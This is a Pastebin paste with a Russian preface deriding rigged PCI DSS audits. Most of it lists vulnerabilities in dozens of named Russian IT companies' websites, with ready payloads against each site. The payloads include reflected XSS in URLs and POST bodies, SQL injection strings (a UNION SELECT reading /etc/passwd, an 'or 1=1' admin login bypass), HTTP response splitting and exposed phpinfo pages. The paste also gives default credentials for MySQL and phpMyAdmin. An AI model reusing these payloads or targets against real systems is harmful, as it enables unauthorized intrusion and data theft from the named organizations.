API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Feb 15th, 2013
2,649
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.75 KB | None | 0 0
raw download clone embed print report
  1. Продолжая мысль про "бумажных специалистов" обсуждаемую на хабре: http://habrahabr.ru/post/169491/
  2.  
  3. Вот вам пример таких бумажных спецов:
  4. Сейчас некоторые интеграторы и аудиторские компании договариваются с банками о заведомо успешной сертификации в рамках PCI DSS.
  5. А именно, о том что сертификации будет подвергаться не вся сеть банка, а только несколько ipшников платежного сегмента....
  6. После такого сотрудничества, потом выясняются такие моменты, что в комментариях к пользователям AD хрянятся их пароли) Чего достаточно для авторизации в самом платежном сегменте. =)
  7.  
  8.  
  9.  
  10. На каждом ресурсе много уязвимостей, это лишь часть из них...
  11.  
  12. ЗЫ: Поделитесь инвайтом на хабр habrleaks@mail.ru :D
  13.  
  14. -------------------------------------------------------------------------------------------
  15.  
  16.  
  17. csbigroup.ru /search/?search_query=%00
  18. 3306/tcp MySQL «root;»
  19. -------------------------------------------------------------------------------------------
  20.  
  21. kami.ru/!go?ln=l[100045].html&c$=200595XSS%40<script>XSS</script>.com&d$=Промо%2Dакции
  22. -------------------------------------------------------------------------------------------
  23.  
  24. digdes.ru/training/register/?id=ms10748XSS%40<script>XSS</script>.com
  25. -------------------------------------------------------------------------------------------
  26.  
  27. ics.perm.ru FTP bounce
  28. -------------------------------------------------------------------------------------------
  29.  
  30. z-it.ru/about/novosti-kompanii/company/13.01.2011?searched=%D0%BF%D0%BE%D0%B8%D1%81%D0%BA&advsearch=oneword&highlight=ajaxSearch%5Fhighlight%2BajaxSearch%5Fhighlight1
  31. The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in <b>/var/www/manager/includes/config.inc.php</b> on line <b>60</b><br />
  32. -------------------------------------------------------------------------------------------
  33.  
  34. ussc.ru/phpinfo.php
  35.  
  36. -------------------------------------------------------------------------------------------
  37.  
  38. http://ascon.ru/
  39. POST /subscribe/?act=subs HTTP/1.1
  40. Host: ascon.ru
  41. lastname=XSS%40<script>XSS</script>.com&firstname=1&middlename=1&email=mail%2Dprof%40MTkyLjE2OC4xMDAuNQ.com
  42.  
  43. -------------------------------------------------------------------------------------------
  44.  
  45. galex.ru
  46. BlindSQLInjection
  47. www.galex.ru/about/news.php?id1=[SQL]
  48. www.galex.ru/search/?PHPSESSID=948cffbf1d1f118f0d2edb64a2f81978&query=XSS%40<script>XSS</script>.com
  49. -------------------------------------------------------------------------------------------
  50.  
  51.  
  52.  
  53. avicomp.ru/phpinfo.php
  54.  
  55. /cgi-bin/printenv
  56. -------------------------------------------------------------------------------------------
  57.  
  58. naumen.ru/clients?filter=s_9999) union select 1,2,3,4,5,LOAD_FILE('/etc/passwd'),7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- s&show_comments=1
  59. http://www.naumen.ru/tests/
  60.  
  61. -------------------------------------------------------------------------------------------
  62.  
  63. www.asbc.ru
  64. HTTP Spliting
  65. -------------------------------------------------------------------------------------------
  66.  
  67. hostco.ru/viewImage.htm?pic=XSS%40<script>XSS</script>.com
  68. -------------------------------------------------------------------------------------------
  69.  
  70.  
  71. BlindSQLInjection
  72. itrealty.ru/about.php?RubricID=[SQL]
  73. http://www.itrealty.ru/adm/pic.php?PicID=288%2D1%20and%201%3D1
  74. itrealty.ru/t.php
  75. www.itrealty.ru/news.php?page=XSS%40<script>XSS</script>.com
  76. -------------------------------------------------------------------------------------------
  77.  
  78.  
  79.  
  80. cbs.ru
  81. POST /site/faq/?section=9476 HTTP/1.1
  82. Host: www.cbs.ru
  83. ref=Вопросы%20и%20ответы&feedback_name=1&feedback_email=mail%2Dprof%40MTkyLjE2OC4xMDAuNQ.com&feedback_tel=1&feedback_captcha1=1&enc_captcha=d95824e0942acae54839c042675d230883effe9b&feedback_submit=Отправить&feedback_message=XSS%40<script>XSS</script>.com
  84.  
  85.  
  86. www.cbs.ru/site/news/?vendor=all'&page=1
  87. -------------------------------------------------------------------------------------------
  88.  
  89.  
  90. SQLInjection
  91. POST /admin_sr/admin_login.php HTTP/1.1
  92. Host: www.saprun.com
  93. adminLog='&adminpasswordec=1
  94. Логин: «’ or 1=1 -- s»
  95. -------------------------------------------------------------------------------------------
  96.  
  97.  
  98. www.lanit.ru
  99. http://www.lanit.ru/projects/index.php?PAGEN_1=2&GROUP=0&BUSINESS=0&REGION=0&q='
  100. from b_iblock_element where name like ''%' and active = 'Y' and iblock_id = 8</font>[You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' and active = 'Y' and iblock_id = 8' at line 1]<br><br>
  101. -------------------------------------------------------------------------------------------
  102. www.technoserv.com
  103. www.technoserv.com/about/company/press/news/?PAGEN_1=2XSS%40<script>XSS</script>.com
  104. -------------------------------------------------------------------------------------------
  105. www.croc.ru/search/?s=1&q=1XSS%40<script>XSS</script>.com
  106.  
  107. -------------------------------------------------------------------------------------------
  108. POST /choosevac.asp HTTP/1.1
  109. Host: www.ibs.ru
  110. choose1=/content/rus/628/6283%2Darticle.aspXSS%40<script>XSS</script>.com
  111.  
  112. -------------------------------------------------------------------------------------------
  113. 1c.ru/rus/partners/training/cso/timetable.jsp?f=1&city=[SQL]
  114. 1c.ru/search/search.cgi?wm=wrdXSS%40<script>XSS</script>.com&wf=2221&GroupBySite=no&ul=http%3A//www.1c.ru&q=1&cmd=Поиск
  115.  
  116. -------------------------------------------------------------------------------------------
  117. www.compulink.ru
  118. POST /feedback/
  119. FIO=1&EMAIL=XSS%40<script>XSS</script>.com&COMPANY=1&send_feedback=qwe&COMMENT=1
  120.  
  121. GET /redirect.php?url=%0D%0AHeader%3A%20Value&1 HTTP/1.0
  122. <b>Warning</b>: Header may not contain more than a single header, new line detected in <b>/home/u289824/compulink.ru/www/redirect.php</b> on line <b>46</b><br />
  123. -------------------------------------------------------------------------------------------
  124.  
  125. www.asteros.ru/webmail/
  126. -------------------------------------------------------------------------------------------
  127.  
  128. www.i-teco.ru/news-arh.php?id=785’ union select 1,2,3 limit 1,1 –- s
  129. SQL база данных: sql.php “admin;<пусто>”
  130.  
  131. -------------------------------------------------------------------------------------------
  132. www.avirsa.ru
  133. POST /ru/subscribe HTTP/1.1
  134. Host: avirsa.ru
  135. email=Введите%20ваш%20e%2Dmail%20XSS%40<script>XSS</script>.com
  136.  
  137. -------------------------------------------------------------------------------------------
  138.  
  139. GET /kownjfxq.htm HTTP/1.1
  140. Host: www.epam-group.ru
  141. Referer: kmmmi<script>XSS</script>.com
  142.  
  143.  
  144. www.epam.com/download.html?downloadParam=/content/dam/epam/library/analysts/CMSXSS%40<script>XSS</script
  145.  
  146. -------------------------------------------------------------------------------------------
  147. www.cft.ru/sitePages/feedback.aspx?to=E.Vinichenko%40cft.ruXSS%40<script>XSS</script>.com&from=http%3A//www.cft.ru/services/basic/Pages/default.asp
  148. www.cft.ru/events/pages/events.aspx?year=XSS%40<script>XSS</script>.com
  149.  
  150. -------------------------------------------------------------------------------------------
  151. BlindSQLInjection
  152. www.ramec.ru/news/archives/?year=[SQL]
  153.  
  154. www.ramec.ru Referer: 1XSS@<script>XSS</script>.com
  155.  
  156. -------------------------------------------------------------------------------------------
  157. tatintec.ru/xjnaq<script>XSS</script>.com
  158. -------------------------------------------------------------------------------------------
  159.  
  160. BlindSQLInjection
  161. http://it.ru/ru/search/?m=all&np=1&ps=10&q=1&s_result_area_id72=72&sp=1&sy=1&ul=http%3A//www.it.ru/'&wf=2221&wm=wrd
  162.  
  163. -------------------------------------------------------------------------------------------
  164.  
  165. amt.ru/company/article.aspx?art_id=myvalue"%20myattribute%3D"java%3Ascript(XSS)"%20
  166.  
  167. -------------------------------------------------------------------------------------------
  168. fors.ru/pls/portal/PORTAL.wwpob_home_page.popup?popup_name=securityXSS%40<script>XSS</script>.com
  169. fors.ru/pls/portal/PORTAL.wwpob_home_page.popup?popup_name=categoriesXSS%40<script>XSS</script>.com
  170.  
  171. -------------------------------------------------------------------------------------------
  172. GET /web/guest/about?p_p_id=82&p_p_action=1&p_p_state=normal&p_p_mode=viewXSS%40<script>XSS</script>.com&p_p_col_id=1&p_p_col_pos=0&p_p_col_count=0&_82_struts_action=/language/view&languageId=ru%5FRU HTTP/1.1
  173. Host: www.icl.ru
  174. -------------------------------------------------------------------------------------------
  175.  
  176. Host: www.stinscoman.com
  177. Cookie: SN4c5904931312f=%00;
  178. sion id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in F:\www\stinscoman.com\manager\includes\config.inc.php on line 60
  179.  
  180. -------------------------------------------------------------------------------------------
  181.  
  182. XSS
  183. ecoprog.ru/admin/
  184.  
  185. -------------------------------------------------------------------------------------------
  186. www.letagroup.ru/rus/library/?company=21XSS%40<script>XSS</script>.com
  187. -------------------------------------------------------------------------------------------
  188.  
  189.  
  190. otr.ru/phpinfo.php
  191. -------------------------------------------------------------------------------------------
  192.  
  193. ret.ru/searchp.jsp?gid=149557&pgid=22604&gpr378748=612577XSS%40<script>XSS</script>.com&searchp=1
  194.  
  195. -------------------------------------------------------------------------------------------
  196.  
  197. diasoft.ru/live/sitesearch.asp?requestStr=1XSS%40<script>XSS</script>.com&useMorh=1
  198. -------------------------------------------------------------------------------------------
  199.  
  200.  
  201. POST /education/save.html HTTP/1.1
  202. Host: teleswyz.ru
  203. contact=1&org=1&phone=1&email=mail%2Dprof%40MTkyLjE2OC4xMDAuNQ.com&id='&seminar_id=4&submit=qwe
  204. >INSERT INTO `seminars_pretender` (`contact`, `org`, `phone`, `email`, `seminar_id`, `send_date`) VALUES ('1', '1', '1', 'mail-prof@MTkyLjE2OC4xMDAuNQ.com', NULL, '2012-08-24 22:08:37')</p><p>Filename: /usr/local/apache22/vhosts/newsite/htdocs/modules/education/controllers/education.php</p><p>
  205. -------------------------------------------------------------------------------------------
  206.  
  207.  
  208. avicon.ru/com.php?id_grp=0XSS%40<script>XSS</script>.com&id_com=0
  209. -------------------------------------------------------------------------------------------
  210.  
  211.  
  212.  
  213. intertech.ru/News/body.asp?filename=20120726122915.xml
  214. <P>Загрузка D:\InetPub\wwwroot\News\20120726122915.xml'</P><P>Error: System error: -2146697210.
  215.  
  216.  
  217. www.intertech.ru/News/body.asp?filename=20120726122915.xmlXSS%40<script>XSS</script>.com
  218.  
  219. -------------------------------------------------------------------------------------------
  220.  
  221. vimcom.ru
  222. POST /search/ HTTP/1.1
  223. Host: www.vimcom.ru
  224. words=я%20ищу...&set=1&pole=XSS%40<script>XSS</script>.com&cat=0
  225. -------------------------------------------------------------------------------------------
  226.  
  227. http://rdtex.ru/server-status
  228.  
  229. -------------------------------------------------------------------------------------------
  230. SQLInjeСon insert cookies
  231. korusconsulting.ru
  232. GET /press-room/activities/reg/?eventID=150 HTTP/1.1
  233. Host: korusconsulting.ru
  234. Cookie: sid=150'; CookieID=150';
  235.  
  236. POST /press-room/research/ HTTP/1.1
  237. Host: korusconsulting.ru
  238. sendid=1&answer[50][]=199&answer[50][0]=0&answer[51][0]=207&answer[52][0]=211&other[50]=XSS%40<script>XSS</script>.com&other[57]=1&Comments=1
  239.  
  240.  
  241. GET /about/contacts/ HTTP/1.1
  242. Host: korusconsulting.ru
  243. Cookie: sid=%00; CookieID=%00;
  244. session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in <b>/home/www/z166658/htdocs/korusconsulting.ru/netcat/index.php(13) : eval()'d code</b> on line <b>26</b><br />
  245.  
  246. korusconsulting.ru/cgi-bin/php.ini
  247. korusconsulting.ru/phpinfo.php
  248. -------------------------------------------------------------------------------------------
  249.  
  250.  
  251.  
  252. parus.ru
  253. POST /company/job/ HTTP/1.1
  254. Host: parus.ru
  255. fio=XSS%40<script>XSS</script>.com&dob=1&family=1&living_city=1&phone=1&email=mail%2Dprof%40MTkyLjE2OC4xMDAuNQ.com&cptcode=1&education=1&courses=1&experience=1&personal=1&position=0
  256.  
  257. -------------------------------------------------------------------------------------------
  258.  
  259.  
  260. galaktika.ru
  261. POST /skachat?category=99&sortby=title HTTP/1.1
  262. Host: www.galaktika.ru
  263. dlsearch=XSS%40<script>XSS</script>.com&page_id=190
  264. -------------------------------------------------------------------------------------------
  265.  
  266.  
  267. aladdin-rd.ru/company/pressroom/events/?view=archive&PAGEN_1=2XSS%40<script>XSS</script>.com
  268. PHPInfo aladdin-rd.ru:443\a.php
  269. -------------------------------------------------------------------------------------------
  270.  
  271. BlindSQLInjection
  272. fortdialog.ru/projects/?Branch=[SQL]
  273. GET /about/ HTTP/1.1
  274. Host: fortdialog.ru
  275. Cookie: sid=%00; QUICK_BAR_CLOSED=%00; CookieID=%00;
  276. -------------------------------------------------------------------------------------------
  277.  
  278.  
  279. itsirius.ru /modules/mod_maximenu_CK/themes/default/css/maximenuH_CK.php?monid=maximenuCKXSS%40<script>XSS</script>.com
  280. -------------------------------------------------------------------------------------------
  281.  
  282.  
  283. hetnet.ru/phpmyadmin/ “Admin;<пусто>”
  284. www.hetnet.ru/contacts/search/?search=поискXSS%40<script>XSS</script>.com
  285. -------------------------------------------------------------------------------------------
  286.  
  287. parma-telecom.ru/conference/details.php?ID=430XSS%40<script>XSS</script>.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!